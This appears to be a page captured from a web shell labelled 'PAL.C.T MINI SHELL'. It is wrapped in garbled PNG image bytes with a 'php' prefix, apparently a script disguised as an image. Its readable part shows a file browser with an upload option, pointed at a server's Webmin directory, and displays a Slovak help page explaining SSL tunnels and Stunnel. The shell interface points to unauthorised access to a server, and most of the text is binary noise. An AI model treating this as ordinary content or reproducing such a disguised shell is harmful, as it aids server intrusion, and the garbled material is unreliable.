php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.sk.auto.html

<header> Úvod do tunelov SSL </header> SSL je protokol na šifrovanie údajov pri pripojení TCP počas jeho prepravy po sieti. Pôvodne bola vyvinutá na ochranu prenosu medzi webovými prehliadačmi a servermi, ale môže sa použiť na šifrovanie akéhokoľvek druhu dátového toku, ktorý by sa normálne odosielal prostredníctvom protokolu TCP. <p> Protokol SSL umožňuje klientom a serverom autentifikovať sa navzájom, takže si klient môže byť istý, že sa skutočne pripája k hostiteľovi, o ktorom si myslí, že je. Toto sa vykonáva pomocou certifikátov, ktoré vydáva certifikačná autorita uznaná klientom (aby ich bolo možné overiť) a ktoré sú spojené s konkrétnym názvom hostiteľa. Bez certifikátov by útočník mohol presmerovať pripojenie SSL na svoj vlastný server a zachytiť citlivé informácie od klienta, ktorý si myslí, že hovorí so skutočným serverom. <p> Útočník môže zachytiť a prečítať všetky údaje, ktoré cestujú cez internet bez šifrovania, s prístupom k jednej zo sietí, cez ktorú prechádza. Dokonca aj údaje, ktoré cestujú medzi klientským a serverovým systémom v sieti LAN, sa dajú ľahko načítať ďalej. Keď sa pripájate k telnetu, FTP alebo POP3 serveru, vaše heslo sa odosiela cez sieť, a tak ho môže útočník zachytiť. <p> Protokol SSL sa dá použiť na ochranu údajov v týchto druhoch situácií, ale iba vtedy, ak ich podporuje klient aj server. Väčšina webových prehliadačov a poštových klientov môže vytvárať pripojenia HTTP, POP3 a IMAP šifrované pomocou SSL, ale nie všetky webové servery a servery POP3 ich môžu prijať. Najmä POP3 je ťažké chrániť, pretože štandardný server dodávaný s väčšinou systémov Unix vôbec nepodporuje SSL. Našťastie však existuje riešenie - Stunnel. <p> Stunnel je jednoduchý program, ktorý prevádza nešifrované pripojenie na šifrované SSL. Spravidla je nastavený tak, aby sa spúšťal zo super-servera, napríklad inetd alebo xinetd, a potom spustil nejaký iný program, napríklad server POP3, ktorý nepodporuje SSL. Tento dizajn mu umožňuje chrániť akýkoľvek server, ktorý sa bežne spúšťa pred inetd, ako sú servery telnet, NNTP a IMAP. <p> Nie všetky servery však môžu byť užitočne chránené šifrovaním, pretože neexistuje žiadny klient, ktorý by ich používal v režime SSL. Napríklad som nikdy nepočula o telnet alebo FTP klientovi, ktorý môže používať SSL, pretože spoločný balík SSH už umožňuje šifrované vzdialené prihlásenie a prenosy súborov. <p> Tento modul Webmin uľahčuje nastavenie super-serverových služieb, ktoré spúšťajú program STunnel na spustenie nejakého serverového programu. Aj keď sa to dá urobiť manuálne pomocou modulu Internet Services, tento je špeciálne navrhnutý na nastavenie a konfiguráciu STunnel. Automaticky zistí, či máte nainštalovaný inetd a / alebo xinetd, prečíta ich konfigurácie, aby skontroloval existenciu tunelov SSL a pridal ich k nim pri vytváraní nového tunela. Ak sú nainštalované obidva, nové konfigurácie tunelov SSL sa pridajú do konfigurácie servera xinetd, pretože podľa môjho názoru je lepší z týchto dvoch. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`